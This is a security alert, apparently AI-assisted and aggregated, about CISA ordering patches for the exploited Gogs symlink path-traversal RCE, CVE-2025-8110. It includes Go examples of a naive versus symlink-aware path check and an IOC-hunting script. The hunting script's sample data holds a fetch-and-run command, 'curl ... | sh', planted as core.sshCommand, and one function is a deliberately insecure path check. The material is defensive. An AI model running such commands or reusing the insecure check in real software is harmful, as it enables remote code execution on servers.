
CISA orders feds to patch Gogs RCE flaw exploited in zero-day attacks

Published:

12 January 2026 at 20:09:16

Alert date:

12 January 2026 at 21:02:40

Source:

bleepingcomputer.com


Zero-Day Vulnerabilities, Web Technologies, Supply Chain & Dependencies

CISA has added a high-severity remote code execution (RCE) vulnerability in Gogs, tracked as CVE-2025-8110, to its Known Exploited Vulnerabilities catalog and ordered federal agencies to patch it. The flaw was exploited in the wild as a zero-day and lets an attacker who holds an account on the server run arbitrary code on the host. Because exploitation is already under way, any organization running a self-hosted Gogs instance, not only the federal agencies covered by the order, should treat this as urgent.

Technical details

CVE-2025-8110 is a remote code execution vulnerability in Gogs caused by a path traversal weakness in the PutContents API, the endpoint that writes file contents into a repository. It bypasses the fix for an earlier RCE, CVE-2024-55947: that fix constrained the requested path itself but did not account for symbolic links inside the repository, so a path that appears to stay within the repository can still resolve to a file outside it. An authenticated attacker first creates a repository containing a symbolic link that points at a sensitive file elsewhere on the server, then calls PutContents on the symlink's path; the write follows the link and overwrites the target outside the repository. The target used in the observed attacks is a Git configuration file, specifically the core.sshCommand option. Git runs the value of core.sshCommand instead of ssh whenever it needs an SSH transport, so once that setting is under attacker control, a subsequent SSH-transport Git operation performed by the Gogs server process executes the attacker's command on the server.
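The following Go program is an added illustration of the weakness described above and of the symlink-aware validation the fix calls for; it is not code from Gogs or from the advisory. A purely lexical containment check (naiveResolve) cleans "../" sequences and verifies the prefix but never consults the filesystem, so it accepts a write to a symlink that points outside the repository. The symlink-aware check (safeResolve) resolves the deepest existing component of the requested path through the filesystem, including a symlink in the final position, and only then tests containment against the resolved repository root. The function names, the temp-directory layout built by buildDemoRepo, and the file names are the example's own constructions.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// ErrOutsideRepo is returned when a write would land outside the repository root.
var ErrOutsideRepo = errors.New("path escapes repository root")

// underRoot is the lexical containment test shared by both checks.
func underRoot(root, p string) bool {
	return p == root || strings.HasPrefix(p, root+string(os.PathSeparator))
}

// naiveResolve is the kind of check that is NOT enough: it cleans "../"
// lexically and verifies the prefix, but a symlink inside the repository
// that points outside it passes, because the filesystem is never consulted.
func naiveResolve(root, rel string) (string, error) {
	full := filepath.Join(root, rel) // Join cleans the path lexically
	if !underRoot(root, full) {
		return "", ErrOutsideRepo
	}
	return full, nil
}

// safeResolve is symlink-aware. It finds the deepest existing ancestor of the
// requested path (possibly the path itself, e.g. an existing symlink), resolves
// it through the filesystem, re-attaches the not-yet-existing tail, and checks
// containment against the resolved repository root.
func safeResolve(root, rel string) (string, error) {
	realRoot, err := filepath.EvalSymlinks(root)
	if err != nil {
		return "", err
	}
	existing := filepath.Join(realRoot, rel)
	tail := ""
	for {
		if _, err := os.Lstat(existing); err == nil { // Lstat does not follow the final link
			break
		}
		tail = filepath.Join(filepath.Base(existing), tail)
		parent := filepath.Dir(existing)
		if parent == existing {
			return "", ErrOutsideRepo
		}
		existing = parent
	}
	resolved, err := filepath.EvalSymlinks(existing) // follows every link, last component included
	if err != nil {
		return "", err
	}
	final := filepath.Join(resolved, tail)
	if !underRoot(realRoot, final) {
		return "", ErrOutsideRepo
	}
	return final, nil
}

// buildDemoRepo constructs the attacker's setup in a temp directory (sample
// data, not from a real instance): <base>/outside/target.conf stands in for a
// sensitive file such as a Git config, and <base>/repo/link is a symlink
// committed into the repository that points at it.
func buildDemoRepo() (string, func(), error) {
	base, err := os.MkdirTemp("", "gogs-demo-")
	if err != nil {
		return "", nil, err
	}
	cleanup := func() { os.RemoveAll(base) }
	root, outside := filepath.Join(base, "repo"), filepath.Join(base, "outside")
	steps := []func() error{
		func() error { return os.MkdirAll(root, 0o755) },
		func() error { return os.MkdirAll(outside, 0o755) },
		func() error { return os.WriteFile(filepath.Join(outside, "target.conf"), []byte("[core]\n"), 0o644) },
		// relative link target, as it would be stored in a commit
		func() error { return os.Symlink("../outside/target.conf", filepath.Join(root, "link")) },
	}
	for _, step := range steps {
		if err := step(); err != nil {
			cleanup()
			return "", nil, err
		}
	}
	return root, cleanup, nil
}

func main() {
	root, cleanup, err := buildDemoRepo()
	if err != nil {
		panic(err)
	}
	defer cleanup()
	for _, rel := range []string{"link", "../outside/target.conf", "docs/new.md"} {
		n, nerr := naiveResolve(root, rel)
		s, serr := safeResolve(root, rel)
		fmt.Printf("%-24s naive: %q %v | symlink-aware: %q %v\n", rel, n, nerr, s, serr)
	}
}
```

Both checks reject the obvious "../outside/target.conf"; only safeResolve rejects "link", which is the case this CVE exploits. The resolution loop matters for writes that create new files: a path such as "linkdir/config", where linkdir is an existing symlink to a directory outside the repository, is caught because the existing prefix is resolved before the new tail is re-attached.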

Mitigation steps:

Apply the patches released by the Gogs maintainers, which add symlink-aware path validation at every file-write entry point. Disable open registration immediately (DISABLE_REGISTRATION under [service] in app.ini): the flaw requires an authenticated account, and the default open-registration setting lets anyone obtain one. Limit access to the server with a VPN or an allow list. Hunt for signs of compromise by reviewing suspicious use of the PutContents API and looking for repositories with random eight-character names. Federal agencies must patch by February 2, 2026. Follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
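As an added example for the compromise check above (not code from Gogs, CISA or the advisory), the Go program below hunts a repository tree for the two indicators the advisory names plus the artefact the attack leaves behind: repositories whose name is exactly eight alphanumeric characters, and bare-repository config files in which core.sshCommand has been set. The <root>/<owner>/<repo>.git/config layout is an assumption about how Gogs stores repositories on disk; the sample tree written by buildSampleRepos, the repository names and the sshCommand value (pointing at a TEST-NET-2 address) are constructed for the example.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

// Heuristic from the advisory: attack-wave repositories carried random
// eight-character names. Legitimate repos can match too, so treat hits as leads.
var eightCharName = regexp.MustCompile(`^[A-Za-z0-9]{8}$`)

// configSetsSSHCommand reports whether a Git config file sets core.sshCommand,
// the key the attackers overwrite. Git config keys are case-insensitive and
// values may be padded, so normalise before comparing.
func configSetsSSHCommand(path string) (bool, string, error) {
	f, err := os.Open(path)
	if err != nil {
		return false, "", err
	}
	defer f.Close()
	inCore := false
	sc := bufio.NewScanner(f)
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if strings.HasPrefix(line, "[") {
			inCore = strings.EqualFold(line, "[core]")
			continue
		}
		key, value, ok := strings.Cut(line, "=")
		if ok && inCore && strings.EqualFold(strings.TrimSpace(key), "sshCommand") {
			return true, strings.TrimSpace(value), nil
		}
	}
	return false, "", sc.Err()
}

// huntRepos scans <reposRoot>/<owner>/<repo>.git/config (assumed Gogs layout)
// and returns, per flagged repository, the reasons it was flagged.
func huntRepos(reposRoot string) (map[string][]string, error) {
	configs, err := filepath.Glob(filepath.Join(reposRoot, "*", "*.git", "config"))
	if err != nil {
		return nil, err
	}
	findings := map[string][]string{}
	for _, cfg := range configs {
		repoDir := filepath.Dir(cfg)
		name := filepath.Base(filepath.Dir(repoDir)) + "/" + filepath.Base(repoDir)
		var reasons []string
		if eightCharName.MatchString(strings.TrimSuffix(filepath.Base(repoDir), ".git")) {
			reasons = append(reasons, "eight-character repository name")
		}
		if set, val, err := configSetsSSHCommand(cfg); err == nil && set {
			reasons = append(reasons, "core.sshCommand = "+val)
		}
		if len(reasons) > 0 {
			findings[name] = reasons
		}
	}
	return findings, nil
}

// buildSampleRepos writes a constructed tree: one benign repo, one matching
// both indicators, one with only the config indicator. Sample data only.
func buildSampleRepos() (string, func(), error) {
	base, err := os.MkdirTemp("", "gogs-hunt-")
	if err != nil {
		return "", nil, err
	}
	cleanup := func() { os.RemoveAll(base) }
	tainted := "[core]\n\tbare = true\n\tsshCommand = curl -s http://198.51.100.7/x | sh\n"
	samples := map[string]string{
		"alice/project.git": "[core]\n\tbare = true\n", // benign
		"bob/x7Qk2pLm.git":  tainted,                    // both indicators
		"carol/notes.git":   tainted,                    // config indicator only
	}
	for repo, cfg := range samples {
		dir := filepath.Join(base, repo)
		if err := os.MkdirAll(dir, 0o755); err != nil {
			cleanup()
			return "", nil, err
		}
		if err := os.WriteFile(filepath.Join(dir, "config"), []byte(cfg), 0o644); err != nil {
			cleanup()
			return "", nil, err
		}
	}
	return base, cleanup, nil
}

func main() {
	root, cleanup, err := buildSampleRepos()
	if err != nil {
		panic(err)
	}
	defer cleanup()
	findings, err := huntRepos(root)
	if err != nil {
		panic(err)
	}
	for repo, reasons := range findings {
		fmt.Printf("%s: %s\n", repo, strings.Join(reasons, "; "))
	}
}
```

Point huntRepos at the instance's real repository root to run it against production data. A core.sshCommand value in a server-side bare repository is a strong indicator on its own, since nothing in normal Gogs operation writes that key; the eight-character name is only a lead and should be confirmed against creation time and the owning account.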

Affected products:

Gogs (Git service written in Go)

Related CVEs:

CVE-2025-8110, CVE-2024-55947 (the earlier Gogs RCE whose fix it bypasses)

IOCs:

Suspicious use of the PutContents API; repositories with random eight-character names created during the attack waves

This article was created with the assistance of AI technology by Perceptive.

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: This website displays information from external sources. Perceptive accepts no responsibility for the content, accuracy or completeness of this information.
